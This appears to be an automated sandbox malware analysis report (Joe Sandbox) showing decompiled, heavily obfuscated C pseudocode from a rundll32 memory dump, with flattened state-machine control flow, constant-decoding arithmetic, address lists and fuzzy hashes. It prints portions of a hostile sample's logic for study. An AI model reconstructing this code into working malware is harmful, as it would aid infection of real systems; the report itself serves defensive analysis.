                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t451 == 0x2f9aadd) {
                                                                                                                      										E00815CDE(_v288, _v392, _v416, _v356, _v280);
                                                                                                                      										E00815CDE(_v304, _v376, _v408, _v324, _t513);
                                                                                                                      										E00815CDE(_v292, _v424, _v348, _v400, _v272);
                                                                                                                      										_t516 =  &(_t516[9]);
                                                                                                                      										_t451 = _t503;
                                                                                                                      										L33:
                                                                                                                      										_t420 = 0xee6d0ab;
                                                                                                                      										goto L34;
                                                                                                                      									} else {
                                                                                                                      										if(_t451 == 0x4bae340) {
                                                                                                                      											_t513 = 0;
                                                                                                                      											E00830710(0x100,  &_v256, _v320, _v384, _v316, _v300);
                                                                                                                      											_v272 = _v272 & 0;
                                                                                                                      											_t516 =  &(_t516[4]);
                                                                                                                      											_v268 = _v268 & 0;
                                                                                                                      											_t451 = 0xce40172;
                                                                                                                      											_v280 = _v280 & 0;
                                                                                                                      											_v276 = _v276 & 0;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t420 = 0xee6d0ab;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											if(_t451 != 0x55bcf65) {
                                                                                                                      												goto L34;
                                                                                                                      											} else {
                                                                                                                      												if(_v276 >= _v332) {
                                                                                                                      													_t447 = E00825C64( &_v280,  &_v272);
                                                                                                                      												} else {
                                                                                                                      													_t447 = E00821B53( &_v280);
                                                                                                                      												}
                                                                                                                      												_t513 = _t447;
                                                                                                                      												_t420 = 0xee6d0ab;
                                                                                                                      												_t451 =  !=  ? 0xee6d0ab : 0x2f9aadd;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L37:
                                                                                                                      							return _t448;
                                                                                                                      						}
                                                                                                                      						if(_t451 == 0xa3ea571) {
                                                                                                                      							_t374 =  *0x10025214 + 0x3c; // 0x10743e39
                                                                                                                      							_t375 =  *0x10025214 + 0x3c; // 0x10743e39
                                                                                                                      							_t428 = E00826FCA(( *_t374)[0x28] & 0x0000ffff,  &_v256,  *( *_t374) & 0x0000ffff, _v372, _v380, _v328, _t513,  &_v272,  &_v264, _v388,  *_t375 + 0x20, _v336);
                                                                                                                      							_t516 =  &(_t516[0xa]);
                                                                                                                      							if(_t428 == 0) {
                                                                                                                      								_t503 = 0x195d899;
                                                                                                                      								_t451 = 0x2f9aadd;
                                                                                                                      								goto L33;
                                                                                                                      							} else {
                                                                                                                      								_t451 = 0xcddb738;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t451 == 0xcddb738) {
                                                                                                                      								if(E0081B10F( &_v264, _v340, _t514, _v396) == 0) {
                                                                                                                      									_t503 = 0x195d899;
                                                                                                                      								} else {
                                                                                                                      									_t503 = 0x1fe0da0;
                                                                                                                      									_t448 = 1;
                                                                                                                      								}
                                                                                                                      								_t451 = 0x77439d8;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t420 = 0xee6d0ab;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t451 == 0xce40172) {
                                                                                                                      									_t430 = E0081139B(_a20,  &_v280, _v308, _v312, _v284, _v344, _a8);
                                                                                                                      									_t516 =  &(_t516[5]);
                                                                                                                      									if(_t430 != 0) {
                                                                                                                      										_t451 = 0x55bcf65;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t451 != _t420) {
                                                                                                                      										goto L34;
                                                                                                                      									} else {
                                                                                                                      										_push(E0081E371(1, 0x40));
                                                                                                                      										_push(_v404);
                                                                                                                      										_push( &_v256);
                                                                                                                      										_t458 = 0xb;
                                                                                                                      										E00814E07(_t458, _v352);
                                                                                                                      										_t516 =  &(_t516[5]);
                                                                                                                      										_t451 = 0xa3ea571;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L37;
                                                                                                                      						L34:
                                                                                                                      					} while (_t451 != 0x1fe0da0);
                                                                                                                      					goto L37;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x00815b17
                                                                                                                      0x00815b1a
                                                                                                                      0x00815b1a
                                                                                                                      0x00815b1d
                                                                                                                      0x00815b22
                                                                                                                      0x00815b24
                                                                                                                      0x00815b27
                                                                                                                      0x00815b27
                                                                                                                      0x00815b2f
                                                                                                                      0x00815b32
                                                                                                                      0x00815ccd
                                                                                                                      0x00815b38
                                                                                                                      0x00815b38
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159f5
                                                                                                                      0x008159fb
                                                                                                                      0x00815abe
                                                                                                                      0x00815ada
                                                                                                                      0x00815afc
                                                                                                                      0x00815b01
                                                                                                                      0x00815b04
                                                                                                                      0x00815cb4
                                                                                                                      0x00815cb4
                                                                                                                      0x00000000
                                                                                                                      0x00815a01
                                                                                                                      0x00815a07
                                                                                                                      0x00815a69
                                                                                                                      0x00815a76
                                                                                                                      0x00815a7b
                                                                                                                      0x00815a82
                                                                                                                      0x00815a85
                                                                                                                      0x00815a8c
                                                                                                                      0x00815a91
                                                                                                                      0x00815a98
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x00815a09
                                                                                                                      0x00815a0f
                                                                                                                      0x00000000
                                                                                                                      0x00815a15
                                                                                                                      0x00815a27
                                                                                                                      0x00815a37
                                                                                                                      0x00815a29
                                                                                                                      0x00815a29
                                                                                                                      0x00815a29
                                                                                                                      0x00815a3c
                                                                                                                      0x00815a45
                                                                                                                      0x00815a4a
                                                                                                                      0x00000000
                                                                                                                      0x00815a4a
                                                                                                                      0x00815a0f
                                                                                                                      0x00815a07
                                                                                                                      0x008159fb
                                                                                                                      0x008159ef
                                                                                                                      0x00815cd4
                                                                                                                      0x00815cdd
                                                                                                                      0x00815cdd
                                                                                                                      0x00815b74
                                                                                                                      0x00815c59
                                                                                                                      0x00815c61
                                                                                                                      0x00815c94
                                                                                                                      0x00815c99
                                                                                                                      0x00815c9e
                                                                                                                      0x00815caa
                                                                                                                      0x00815caf
                                                                                                                      0x00000000
                                                                                                                      0x00815ca0
                                                                                                                      0x00815ca0
                                                                                                                      0x00000000
                                                                                                                      0x00815ca0
                                                                                                                      0x00815b7a
                                                                                                                      0x00815b80
                                                                                                                      0x00815c2e
                                                                                                                      0x00815c3a
                                                                                                                      0x00815c30
                                                                                                                      0x00815c32
                                                                                                                      0x00815c37
                                                                                                                      0x00815c37
                                                                                                                      0x00815c3f
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x00815b86
                                                                                                                      0x00815b8c
                                                                                                                      0x00815bfb
                                                                                                                      0x00815c00
                                                                                                                      0x00815c05
                                                                                                                      0x00815c0b
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00815b8e
                                                                                                                      0x00815b90
                                                                                                                      0x00000000
                                                                                                                      0x00815b96
                                                                                                                      0x00815ba7
                                                                                                                      0x00815ba8
                                                                                                                      0x00815bb7
                                                                                                                      0x00815bba
                                                                                                                      0x00815bbb
                                                                                                                      0x00815bc0
                                                                                                                      0x00815bc3
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00000000
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x00815b90
                                                                                                                      0x00815b8c
                                                                                                                      0x00815b80
                                                                                                                      0x00000000
                                                                                                                      0x00815cb9
                                                                                                                      0x00815cb9
                                                                                                                      0x00000000
                                                                                                                      0x00815cc5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )%I$,?D$4`$J<$KE$NU$[w$owF$3)
                                                                                                                      • API String ID: 0-2094660596
                                                                                                                      • Opcode ID: 4739080588a8bd29ffabcd1cba0414d088d0c954afae036dad15161931f03690
                                                                                                                      • Instruction ID: 28c44e03a5061bdfe7b3bb5324efcf37fbd6319668180397a6e9151e24826cf8
                                                                                                                      • Opcode Fuzzy Hash: 4739080588a8bd29ffabcd1cba0414d088d0c954afae036dad15161931f03690
                                                                                                                      • Instruction Fuzzy Hash: 5A223271108781CFD768CF25C486A9BBBE1FFC4758F10891DE69A8A261D7B18949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0082A0D3(intOrPtr* __ecx) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr* _v12;
                                                                                                                      				char _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				void* _t358;
                                                                                                                      				void* _t366;
                                                                                                                      				void* _t375;
                                                                                                                      				signed int _t378;
                                                                                                                      				signed int _t379;
                                                                                                                      				signed int _t380;
                                                                                                                      				signed int _t381;
                                                                                                                      				signed int _t382;
                                                                                                                      				signed int _t383;
                                                                                                                      				signed int _t384;
                                                                                                                      				signed int _t385;
                                                                                                                      				intOrPtr* _t426;
                                                                                                                      				intOrPtr _t430;
                                                                                                                      				signed int* _t431;
                                                                                                                      
                                                                                                                      				_t431 =  &_v160;
                                                                                                                      				_t426 = __ecx;
                                                                                                                      				_v12 = __ecx;
                                                                                                                      				_v8 = 0x8c571a;
                                                                                                                      				_t430 = 0;
                                                                                                                      				_t375 = 0x79707ab;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v64 = 0xfc5ff;
                                                                                                                      				_v64 = _v64 >> 6;
                                                                                                                      				_v64 = _v64 ^ 0x00003f17;
                                                                                                                      				_v140 = 0x873397;
                                                                                                                      				_v140 = _v140 * 0x50;
                                                                                                                      				_v140 = _v140 << 5;
                                                                                                                      				_v140 = _v140 << 4;
                                                                                                                      				_v140 = _v140 ^ 0x803e6000;
                                                                                                                      				_v112 = 0x5cc448;
                                                                                                                      				_v112 = _v112 | 0xb5fdf5b7;
                                                                                                                      				_v112 = _v112 >> 9;
                                                                                                                      				_v112 = _v112 ^ 0x005afefa;
                                                                                                                      				_v60 = 0x19d054;
                                                                                                                      				_t378 = 0x29;
                                                                                                                      				_v60 = _v60 / _t378;
                                                                                                                      				_v60 = _v60 ^ 0x0000a12d;
                                                                                                                      				_v40 = 0x4c7c9b;
                                                                                                                      				_t379 = 0x7b;
                                                                                                                      				_v40 = _v40 / _t379;
                                                                                                                      				_v40 = _v40 ^ 0x00009f31;
                                                                                                                      				_v88 = 0xb88e01;
                                                                                                                      				_v88 = _v88 << 8;
                                                                                                                      				_v88 = _v88 | 0xb280bd16;
                                                                                                                      				_v88 = _v88 ^ 0xba886110;
                                                                                                                      				_v80 = 0xf71efc;
                                                                                                                      				_v80 = _v80 << 9;
                                                                                                                      				_t380 = 0x34;
                                                                                                                      				_v80 = _v80 / _t380;
                                                                                                                      				_v80 = _v80 ^ 0x04950844;
                                                                                                                      				_v96 = 0xf5fda;
                                                                                                                      				_v96 = _v96 >> 7;
                                                                                                                      				_t381 = 0x11;
                                                                                                                      				_v96 = _v96 * 0x46;
                                                                                                                      				_v96 = _v96 ^ 0x00041aa2;
                                                                                                                      				_v156 = 0x96c5de;
                                                                                                                      				_v156 = _v156 / _t381;
                                                                                                                      				_v156 = _v156 ^ 0x88ccdc31;
                                                                                                                      				_v156 = _v156 * 0x3d;
                                                                                                                      				_v156 = _v156 ^ 0x96be8a04;
                                                                                                                      				_v72 = 0x71396c;
                                                                                                                      				_v72 = _v72 << 0xa;
                                                                                                                      				_v72 = _v72 ^ 0x367e7763;
                                                                                                                      				_v72 = _v72 ^ 0xf298a4dc;
                                                                                                                      				_v148 = 0xd59d39;
                                                                                                                      				_v148 = _v148 >> 6;
                                                                                                                      				_v148 = _v148 + 0xffff0863;
                                                                                                                      				_v148 = _v148 << 4;
                                                                                                                      				_v148 = _v148 ^ 0x0020b4d1;
                                                                                                                      				_v116 = 0x4e2a72;
                                                                                                                      				_v116 = _v116 ^ 0x41f61916;
                                                                                                                      				_t382 = 0x66;
                                                                                                                      				_v116 = _v116 / _t382;
                                                                                                                      				_v116 = _v116 ^ 0xb72c0337;
                                                                                                                      				_v116 = _v116 ^ 0xb7828c59;
                                                                                                                      				_v28 = 0x7f34ff;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 ^ 0xfe6bca43;
                                                                                                                      				_v124 = 0x9f58a2;
                                                                                                                      				_v124 = _v124 + 0xffff9c37;
                                                                                                                      				_v124 = _v124 + 0x725a;
                                                                                                                      				_v124 = _v124 << 7;
                                                                                                                      				_v124 = _v124 ^ 0x4fb1837f;
                                                                                                                      				_v52 = 0xa9f0c8;
                                                                                                                      				_v52 = _v52 + 0xfffffc3c;
                                                                                                                      				_v52 = _v52 ^ 0x00ad5534;
                                                                                                                      				_v24 = 0xa43c6e;
                                                                                                                      				_t383 = 0x6e;
                                                                                                                      				_v24 = _v24 * 0x5b;
                                                                                                                      				_v24 = _v24 ^ 0x3a644c1a;
                                                                                                                      				_v132 = 0x7fb628;
                                                                                                                      				_v132 = _v132 * 0xb;
                                                                                                                      				_v132 = _v132 << 6;
                                                                                                                      				_v132 = _v132 << 0xd;
                                                                                                                      				_v132 = _v132 ^ 0x9dcf3d61;
                                                                                                                      				_v100 = 0x597f63;
                                                                                                                      				_v100 = _v100 | 0xd4d51309;
                                                                                                                      				_v100 = _v100 << 9;
                                                                                                                      				_v100 = _v100 ^ 0xbafad16c;
                                                                                                                      				_v108 = 0x4d061a;
                                                                                                                      				_v108 = _v108 >> 2;
                                                                                                                      				_v108 = _v108 ^ 0xd197d397;
                                                                                                                      				_v108 = _v108 + 0xffff042d;
                                                                                                                      				_v108 = _v108 ^ 0xd1833bae;
                                                                                                                      				_v20 = 0x2586e5;
                                                                                                                      				_v20 = _v20 + 0x8581;
                                                                                                                      				_v20 = _v20 ^ 0x0026b83c;
                                                                                                                      				_v92 = 0x3ae4f5;
                                                                                                                      				_v92 = _v92 << 1;
                                                                                                                      				_v92 = _v92 << 0xb;
                                                                                                                      				_v92 = _v92 ^ 0xae4bd9c6;
                                                                                                                      				_v44 = 0xe6dc30;
                                                                                                                      				_v44 = _v44 ^ 0xd3982ed3;
                                                                                                                      				_v44 = _v44 ^ 0xd37e8c85;
                                                                                                                      				_v144 = 0xe42628;
                                                                                                                      				_v144 = _v144 | 0xc37700ac;
                                                                                                                      				_v144 = _v144 >> 0xa;
                                                                                                                      				_v144 = _v144 << 0xc;
                                                                                                                      				_v144 = _v144 ^ 0x0fd23fe2;
                                                                                                                      				_v152 = 0x41402a;
                                                                                                                      				_t186 =  &_v152; // 0x41402a
                                                                                                                      				_t384 = 0x19;
                                                                                                                      				_v152 =  *_t186 / _t383;
                                                                                                                      				_v152 = _v152 * 0x6a;
                                                                                                                      				_v152 = _v152 ^ 0x2485591b;
                                                                                                                      				_v152 = _v152 ^ 0x24bff8d4;
                                                                                                                      				_v160 = 0xbf0758;
                                                                                                                      				_v160 = _v160 + 0x522b;
                                                                                                                      				_v160 = _v160 >> 0xe;
                                                                                                                      				_v160 = _v160 + 0xffff65d4;
                                                                                                                      				_v160 = _v160 ^ 0xfff1feea;
                                                                                                                      				_v84 = 0x1a9ecc;
                                                                                                                      				_v84 = _v84 << 0x10;
                                                                                                                      				_t385 = 0x2d;
                                                                                                                      				_v84 = _v84 / _t384;
                                                                                                                      				_v84 = _v84 ^ 0x065118ef;
                                                                                                                      				_v120 = 0x6a6625;
                                                                                                                      				_t219 =  &_v120; // 0x6a6625
                                                                                                                      				_v120 =  *_t219 / _t385;
                                                                                                                      				_v120 = _v120 >> 0xd;
                                                                                                                      				_v120 = _v120 + 0x1650;
                                                                                                                      				_v120 = _v120 ^ 0x00013394;
                                                                                                                      				_v76 = 0x6cd503;
                                                                                                                      				_v76 = _v76 + 0xffff64c6;
                                                                                                                      				_v76 = _v76 * 0x17;
                                                                                                                      				_v76 = _v76 ^ 0x09bb62c3;
                                                                                                                      				_v128 = 0x4363ee;
                                                                                                                      				_v128 = _v128 | 0x70162fad;
                                                                                                                      				_v128 = _v128 * 0x15;
                                                                                                                      				_v128 = _v128 + 0xffff87d6;
                                                                                                                      				_v128 = _v128 ^ 0x372e6b7a;
                                                                                                                      				_v36 = 0xd9ddf9;
                                                                                                                      				_v36 = _v36 << 5;
                                                                                                                      				_v36 = _v36 ^ 0x1b34c995;
                                                                                                                      				_v136 = 0xc7126f;
                                                                                                                      				_v136 = _v136 << 3;
                                                                                                                      				_v136 = _v136 >> 6;
                                                                                                                      				_v136 = _v136 + 0x2e5f;
                                                                                                                      				_v136 = _v136 ^ 0x001d82e9;
                                                                                                                      				_v104 = 0x7714f2;
                                                                                                                      				_v104 = _v104 << 2;
                                                                                                                      				_v104 = _v104 * 5;
                                                                                                                      				_t358 = 0x5786d8d;
                                                                                                                      				_v104 = _v104 | 0x0a59959c;
                                                                                                                      				_v104 = _v104 ^ 0x0b5ace50;
                                                                                                                      				_v68 = 0x585054;
                                                                                                                      				_v68 = _v68 ^ 0x33c1c88e;
                                                                                                                      				_v68 = _v68 ^ 0x9bceaa07;
                                                                                                                      				_v68 = _v68 ^ 0xa855990f;
                                                                                                                      				_v56 = 0xa2136b;
                                                                                                                      				_v56 = _v56 + 0x4ebb;
                                                                                                                      				_v56 = _v56 ^ 0x00a98962;
                                                                                                                      				_v32 = 0x51a57b;
                                                                                                                      				_v32 = _v32 >> 0xe;
                                                                                                                      				_v32 = _v32 ^ 0x0002096e;
                                                                                                                      				_v48 = 0x9fd766;
                                                                                                                      				_v48 = _v48 | 0x00a10b6a;
                                                                                                                      				_v48 = _v48 ^ 0x00bfd9fa;
                                                                                                                      				do {
                                                                                                                      					while(_t375 != _t358) {
                                                                                                                      						if(_t375 == 0x79707ab) {
                                                                                                                      							_t375 = 0x7c4530c;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t375 == 0x7c4530c) {
                                                                                                                      								_push(_v156);
                                                                                                                      								_push(_v96);
                                                                                                                      								_push(0x10001678);
                                                                                                                      								_t366 = E00819F66(_v88, _v80, __eflags);
                                                                                                                      								_push(_v28);
                                                                                                                      								_push(_v116);
                                                                                                                      								_t302 =  &_v148; // 0x372e6b7a
                                                                                                                      								_push(0x10001538);
                                                                                                                      								__eflags = E008202DA(E00819F66(_v72,  *_t302, __eflags), _v64, _v124, _t366,  &_v16, _v52, _v24) - _v140;
                                                                                                                      								_t375 =  ==  ? 0x5786d8d : 0xbb932f6;
                                                                                                                      								E0081A203(_v132, _v100, _v108, _t366);
                                                                                                                      								E0081A203(_v20, _v92, _v44, _t367);
                                                                                                                      								_t426 = _v12;
                                                                                                                      								_t431 =  &(_t431[0xf]);
                                                                                                                      								L10:
                                                                                                                      								_t358 = 0x5786d8d;
                                                                                                                      								goto L11;
                                                                                                                      							} else {
                                                                                                                      								if(_t375 != 0xfc0b370) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									E00816427(_v32, _v40, _v16, _v48);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t430;
                                                                                                                      					}
                                                                                                                      					_push(_v84);
                                                                                                                      					_push(_v160);
                                                                                                                      					_push(0x10001588);
                                                                                                                      					__eflags = E0082EDE2(_v112, _v120, _v16,  *_t426, _v76, _v144, _v128,  *((intOrPtr*)(_t426 + 4)), _v36, _v136, E00819F66(_v144, _v152, __eflags),  *0x10025c9c + 8) - _v60;
                                                                                                                      					_t375 = 0xfc0b370;
                                                                                                                      					_t430 =  ==  ? 1 : _t430;
                                                                                                                      					E0081A203(_v104, _v68, _v56, _t359);
                                                                                                                      					_t431 =  &(_t431[0xf]);
                                                                                                                      					goto L10;
                                                                                                                      					L11:
                                                                                                                      					__eflags = _t375 - 0xbb932f6;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L6;
                                                                                                                      			}

























































                                                                                                                      0x0082a235
                                                                                                                      0x0082a23a
                                                                                                                      0x0082a242
                                                                                                                      0x0082a24a
                                                                                                                      0x0082a252
                                                                                                                      0x0082a257
                                                                                                                      0x0082a25f
                                                                                                                      0x0082a264
                                                                                                                      0x0082a26c
                                                                                                                      0x0082a274
                                                                                                                      0x0082a284
                                                                                                                      0x0082a289
                                                                                                                      0x0082a28f
                                                                                                                      0x0082a297
                                                                                                                      0x0082a29f
                                                                                                                      0x0082a2aa
                                                                                                                      0x0082a2b2
                                                                                                                      0x0082a2bd
                                                                                                                      0x0082a2c5
                                                                                                                      0x0082a2cd
                                                                                                                      0x0082a2d5
                                                                                                                      0x0082a2da
                                                                                                                      0x0082a2e2
                                                                                                                      0x0082a2ed
                                                                                                                      0x0082a2f8
                                                                                                                      0x0082a303
                                                                                                                      0x0082a316
                                                                                                                      0x0082a319
                                                                                                                      0x0082a320
                                                                                                                      0x0082a32b
                                                                                                                      0x0082a338
                                                                                                                      0x0082a33c
                                                                                                                      0x0082a341
                                                                                                                      0x0082a346
                                                                                                                      0x0082a34e
                                                                                                                      0x0082a356
                                                                                                                      0x0082a35e
                                                                                                                      0x0082a363
                                                                                                                      0x0082a36b
                                                                                                                      0x0082a373
                                                                                                                      0x0082a378
                                                                                                                      0x0082a380
                                                                                                                      0x0082a388
                                                                                                                      0x0082a390
                                                                                                                      0x0082a39b
                                                                                                                      0x0082a3a6
                                                                                                                      0x0082a3b1
                                                                                                                      0x0082a3b9
                                                                                                                      0x0082a3bd
                                                                                                                      0x0082a3c2
                                                                                                                      0x0082a3ca
                                                                                                                      0x0082a3d5
                                                                                                                      0x0082a3e0
                                                                                                                      0x0082a3eb
                                                                                                                      0x0082a3f3
                                                                                                                      0x0082a3fb
                                                                                                                      0x0082a400
                                                                                                                      0x0082a405
                                                                                                                      0x0082a40d
                                                                                                                      0x0082a415
                                                                                                                      0x0082a41b
                                                                                                                      0x0082a41c
                                                                                                                      0x0082a429
                                                                                                                      0x0082a42d
                                                                                                                      0x0082a435
                                                                                                                      0x0082a43d
                                                                                                                      0x0082a445
                                                                                                                      0x0082a44d
                                                                                                                      0x0082a452
                                                                                                                      0x0082a45a
                                                                                                                      0x0082a462
                                                                                                                      0x0082a46a
                                                                                                                      0x0082a475
                                                                                                                      0x0082a476
                                                                                                                      0x0082a47a
                                                                                                                      0x0082a484
                                                                                                                      0x0082a48c
                                                                                                                      0x0082a492
                                                                                                                      0x0082a496
                                                                                                                      0x0082a49b
                                                                                                                      0x0082a4a3
                                                                                                                      0x0082a4ab
                                                                                                                      0x0082a4b3
                                                                                                                      0x0082a4c0
                                                                                                                      0x0082a4c4
                                                                                                                      0x0082a4cc
                                                                                                                      0x0082a4d4
                                                                                                                      0x0082a4e1
                                                                                                                      0x0082a4e5
                                                                                                                      0x0082a4ed
                                                                                                                      0x0082a4f5
                                                                                                                      0x0082a500
                                                                                                                      0x0082a508
                                                                                                                      0x0082a513
                                                                                                                      0x0082a51b
                                                                                                                      0x0082a520
                                                                                                                      0x0082a525
                                                                                                                      0x0082a52d
                                                                                                                      0x0082a535
                                                                                                                      0x0082a53d
                                                                                                                      0x0082a547
                                                                                                                      0x0082a54b
                                                                                                                      0x0082a550
                                                                                                                      0x0082a558
                                                                                                                      0x0082a560
                                                                                                                      0x0082a568
                                                                                                                      0x0082a570
                                                                                                                      0x0082a578
                                                                                                                      0x0082a580
                                                                                                                      0x0082a588
                                                                                                                      0x0082a590
                                                                                                                      0x0082a598
                                                                                                                      0x0082a5a3
                                                                                                                      0x0082a5ab
                                                                                                                      0x0082a5b6
                                                                                                                      0x0082a5c1
                                                                                                                      0x0082a5cc
                                                                                                                      0x0082a5d7
                                                                                                                      0x0082a5d7
                                                                                                                      0x0082a5e5
                                                                                                                      0x0082a6e7
                                                                                                                      0x00000000
                                                                                                                      0x0082a5eb
                                                                                                                      0x0082a5f1
                                                                                                                      0x0082a62f
                                                                                                                      0x0082a633
                                                                                                                      0x0082a63f
                                                                                                                      0x0082a644
                                                                                                                      0x0082a649
                                                                                                                      0x0082a652
                                                                                                                      0x0082a656
                                                                                                                      0x0082a65e
                                                                                                                      0x0082a69e
                                                                                                                      0x0082a6b5
                                                                                                                      0x0082a6b8
                                                                                                                      0x0082a6d3
                                                                                                                      0x0082a6d8
                                                                                                                      0x0082a6df
                                                                                                                      0x0082a77b
                                                                                                                      0x0082a77b
                                                                                                                      0x00000000
                                                                                                                      0x0082a5f3
                                                                                                                      0x0082a5f9
                                                                                                                      0x00000000
                                                                                                                      0x0082a5ff
                                                                                                                      0x0082a61b
                                                                                                                      0x0082a621
                                                                                                                      0x0082a5f9
                                                                                                                      0x0082a5f1
                                                                                                                      0x0082a624
                                                                                                                      0x0082a62e
                                                                                                                      0x0082a62e
                                                                                                                      0x0082a6f1
                                                                                                                      0x0082a6f5
                                                                                                                      0x0082a701
                                                                                                                      0x0082a756
                                                                                                                      0x0082a758
                                                                                                                      0x0082a765
                                                                                                                      0x0082a773
                                                                                                                      0x0082a778
                                                                                                                      0x00000000
                                                                                                                      0x0082a780
                                                                                                                      0x0082a780
                                                                                                                      0x0082a780
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %fj$(&$*@A$+R$TPX$_.$cw~6$r*N$zk.7
                                                                                                                      • API String ID: 0-4179132742
                                                                                                                      • Opcode ID: 27272dbc85d7bd84491a8b360d47140a79a37765126f2e62aad6e2b089615009
                                                                                                                      • Instruction ID: e21b986debef690a434dfdb71046672a55b4f00a4d4f8193c03111f99b74a58c
                                                                                                                      • Opcode Fuzzy Hash: 27272dbc85d7bd84491a8b360d47140a79a37765126f2e62aad6e2b089615009
                                                                                                                      • Instruction Fuzzy Hash: DCF1FD715083809FD7A8CF25D58AA4BBBE2FBC4748F50891DF59A86260DBB19949CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E008250F9() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
